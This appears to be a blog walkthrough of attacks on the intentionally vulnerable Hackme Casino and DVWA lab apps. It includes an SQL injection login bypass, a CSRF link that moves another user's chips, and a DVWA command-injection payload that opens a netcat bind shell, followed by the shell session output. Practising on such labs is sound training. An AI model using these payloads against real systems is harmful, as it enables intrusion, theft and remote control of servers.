web application – application simulators

Web Security Dojo – http://www.mavensecurity.com/web_security_dojo/

1. Down load VM or virtual box image. Install and click on Applications/Accessories (open) Terminal

Add an IP address

dojo@dojo-vm:~$ sudo ifconfig eth1 192.168.1.2 netmask 255.255.255.0 (press enter)
[sudo] password for dojo: dojo (press enter)
dojo@dojo-vm:~$

Hackme Casino

1. Click on Applications/Targets/Hackme Casino Start (firefox should startup and will state Offline mode) File un tick work offline, refresh

2. Open another VM or Virtual box machine I use Backtrack 5R1 click on Applications/Accessories (open) Terminal

Add an IP in the same network and check working by pining dojo IP address.

3. Open a browser in backtrack and type in http://192.168.1.2:3000 This should open the remote Hackme app

4. Let the fun begin!

5. Hit it with Nikto, W3af, Metasploit, Nessus anything you can think of.

As example of interesting tool www.myexploit.wordpress.com/web-application-owasp_zap/

Zap demo using Hackme Casino

1. Set firefox proxy in backtrack to point to Zap. In Firefox Edit/Preferences/Advanced/Network/Settings

Tick Manual proxy configuration HTTP Proxy = 127.0.0.1 and Port = 8080 OK, Close.

2. Start up zap root@bt:/pentest/web/owasp-zap# java -jar zap.jar and then refresh Firefox browser you should see 192.168.1.2:3000 under sites in ZAP.

3. Now proxy is working it’s time to Log in to Hackme Casino. For username use sqlinjection bellow no password required just add the sqlinjection and press enter.

') OR 1=1--

4. Now logged in lets try Cross-Site Request Forgery to steal some chips. This is a great example. The concept write a url string that once clicked by another user they will send you chips with out knowing.

To work you need another users account log out and log in as username: bobby_blackjack and the password: twenty_one

5. Go to Options/Transfer chips type in 0 and change recipient to andy_aces press enter

Response = This is not an acceptable value – This is great as an error sign

Now setup lets use it

1. ZAP / History Looking at this you will see trying to post the 0 chips below shows how the proxy shows this..

POST http://192.168.1.2:3000/account/transfer_chips

RAW data shows  view transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

2. From the results from ZAP create a url as bellow and paste into browser and resend. (Paste in and press enter)

http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

3. The result show an interesting error screen (as can see bellow) it also has reformatted the input.(Why? I’m not sure! but yep it helps!)

Error reads – Unknown action

No action responded to transfer=000000000000000000&login[]=bobby_blackjack&commit=Transfer Chips

Note in the url  Transfer+Chipsit it has added a + between Transfer Chipsit. So it  does not like gaps, ok thanks for this info!

4. So now i try a different string made up from the errors and what i feel may work,  http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=andy_aces&commit=Transfer+Chips

No joy so more trying This time adding the findings and trying

http://192.168.1.2:3000/account/transfer_chips/transfer=100&login%5B%5D=andy_aces&commit=Transfer+Chips

5. The result no error signs so is it work? Nope as no chips are moved across, the problem is the use of / sign at end of  transfer_chips = http://192.168.1.2:3000/account/transfer_chips/

we dont want to go to another directory we want to execute the command transfer=100&login%5B%5D=andy_aces&commit=Transfer+Chips

So trying to replace / with a ?

http://192.168.1.2:3000/account/transfer_chips?transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

Results the chips go down. And andy_aces gets a nice gift!

For info if you write a Cross-Site Request Forgery it can be converted by Free URL redirection service like tinyur. So be careful opening links!

POST http://192.168.1.2:3000/account/transfer_chips
RAW view transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

from results above create a url as bellow and paste into browser

http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

The result is an error screen intresting because it has reformated the input.
Unknown action

No action responded to transfer=000000000000000000&login[]=bobby_blackjack&commit=Transfer Chips

and url changed too

http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

This time adding the findings and trying
http://192.168.1.2:3000/account/transfer_chips/transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

The result no error but no chips are moved across, the problem is http://192.168.1.2:3000/account/transfer_chips/ the /
/ = directory chnage but we want to execute the command transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
So trying to replace / with a ?

http://192.168.1.2:3000/account/transfer_chips?transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
Results the chips go down. So now if you replaced the username with your own and tricked another logged in user to click on the link
they would send you chips.

————————————————————-

DVWA

Command Execution

Web browser to
ip-address/dvwa/vulnerabilities/exec/

Vulnerability: Command Execution
Ping for FREE

type in to the box
remote-ip-address;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe
(press submit)

Open terminal and type in

root@bt:~# nc remote-ip-address 13371
cd /etc
ls -l
total 1104
drwxr-xr-x 5 root root 4096 Aug 16 2010 ConsoleKit
drwxr-xr-x 5 root root 4096 Jul 3 07:06 NetworkManager
drwxr-xr-x 2 root root 4096 Dec 4 2009 ODBCDataSources
drwxr-xr-x 10 root root 4096 Aug 16 2010 X11
drwxr-xr-x 3 root root 4096 Aug 16 2010 acpi
-rw-r–r– 1 root root 2981 Aug 16 2010 adduser.conf
drwxr-xr-x 2 root root 12288 Jul 3 07:25 alternatives
-rw-r–r– 1 root root 395 Mar 4 2010 anacrontab
drwxr-xr-x 7 root root 4096 Jun 29 04:55 apache2
drwxr-xr-x 6 root root 4096 Aug 16 2010 apm
drwxr-xr-x 3 root root 4096 Aug 16 2010 apparmor
drwxr-xr-x 7 root root 4096 Sep 30 2010 apparmor.d

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s